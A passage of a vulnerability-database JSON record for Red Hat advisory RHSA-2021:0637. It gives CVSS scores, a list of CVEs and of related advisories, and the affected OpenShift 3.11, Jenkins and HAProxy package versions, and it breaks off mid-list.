This was caused by the `cluster_facts.yml` file being gathered before the `openshift_release` attribute was defined by the upgrade playbook. Now the `cluster_facts.yml` file is gathered after the `openshift_version` role runs and the `openshift_release` attribute is set, allowing for successful node upgrades. (BZ#1921353)\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.", "published": "2021-03-03T17:05:11", "modified": "2021-03-30T18:34:36", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0637", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25658", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611"], "immutableFields": [], "lastseen": "2021-07-28T14:36:49", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2021-0423.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "EULEROS_SA-2021-1133.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0637.NASL", "FEDORA_2020-2640AA4E19.NASL", "FEDORA_2020-92B1D001B3.NASL", "REDHAT-RHSA-2021-0429.NASL"]}, {"type": "archlinux", "idList": ["ASA-202101-41", "ASA-202012-5", "ASA-202005-15"]}, {"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2021:0038", "RHSA-2021:0039", "RHSA-2021:0282", "RHSA-2020:2618", "RHSA-2021:0034", "RHSA-2021:0719", "RHSA-2021:0429", "RHSA-2021:0037"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21604", "RH:CVE-2021-21608", "RH:CVE-2021-21603", "RH:CVE-2021-21610", "RH:CVE-2021-21611", "RH:CVE-2021-21602", "RH:CVE-2020-11979", "RH:CVE-2021-21609", "RH:CVE-2021-21606", "RH:CVE-2021-21607"]}, {"type": "cve", "idList": ["CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21611", "CVE-2021-21605", "CVE-2021-21609", "CVE-2021-21603", "CVE-2021-21608", "CVE-2021-21604", "CVE-2021-21602", "CVE-2021-21610"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979", "UB:CVE-2020-25658"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:52396606732B", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:6869030D3139"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}], "modified": "2021-07-28T14:36:49", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-28T14:36:49", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-controller-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-controller"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.x86_64.rpm", "operator": "lt", "packageName": "haproxy18"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-docs-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-docs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.ppc64le.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5-3.el7", "packageFilename": "python-rsa-4.5-3.el7.src.rpm", "operator": "lt", "packageName": "python-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus-alertmanager"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-common-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-common"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.src.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus-alertmanager"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-sdn-ovs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-roles-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-roles"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-master"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-dockerregistry"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-sdn-ovs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "golang-github-prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-alertmanager"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "python2-kuryr-kubernetes-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "python2-kuryr-kubernetes"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-template-service-broker"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-1.8.28-1.el7.src.rpm", "operator": "lt", "packageName": "haproxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-pod"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt", "packageName": "atomic-openshift-excluder"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-redistributable-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.x86_64.rpm", "operator": "lt", "packageName": "haproxy-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-template-service-broker"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.src.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog-svcat"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-node"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5-3.el7", "packageFilename": "python2-rsa-4.5-3.el7.noarch.rpm", "operator": "lt", "packageName": "python2-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-cni-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-cni"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.x86_64.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-master"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.ppc64le.rpm", "operator": "lt", "packageName": "haproxy18"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.src.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-3.11.394-1.git.1490.16ed375.el7.src.rpm", "operator": "lt", "packageName": "openshift-kuryr"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-docker-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt", "packageName": "atomic-openshift-docker-excluder"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-test-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus-node-exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-tests"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-node"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-playbooks-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-playbooks"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus-node-exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "golang-github-prometheus-node_exporter-3.11.394-1.git.1062.8adc4b8.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-node_exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.src.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "golang-github-prometheus-prometheus-3.11.394-1.git.5026.2c9627f.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-prometheus"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-hypershift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-tests"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-dockerregistry"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog-svcat"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-pod"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-hypershift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.ppc64le.rpm", "operator": "lt", "packageName": "haproxy-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus"}], "vendorCvss": {}}, "lastseen": "2021-07-28T14:36:49", "differentElements": ["vendorCvss"], "edition": 3}], "viewCount": 69, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1022.NASL", "REDHAT-RHSA-2021-0637.NASL", "EULEROS_SA-2020-1794.NASL", "GENTOO_GLSA-202011-18.NASL", "REDHAT-RHSA-2021-0038.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "EULEROS_SA-2020-2132.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "REDHAT-RHSA-2021-0034.NASL", "REDHAT-RHSA-2021-0423.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "FEDORA_2020-52741B0A49.NASL", "FEDORA_2020-3CE0F55BC5.NASL", 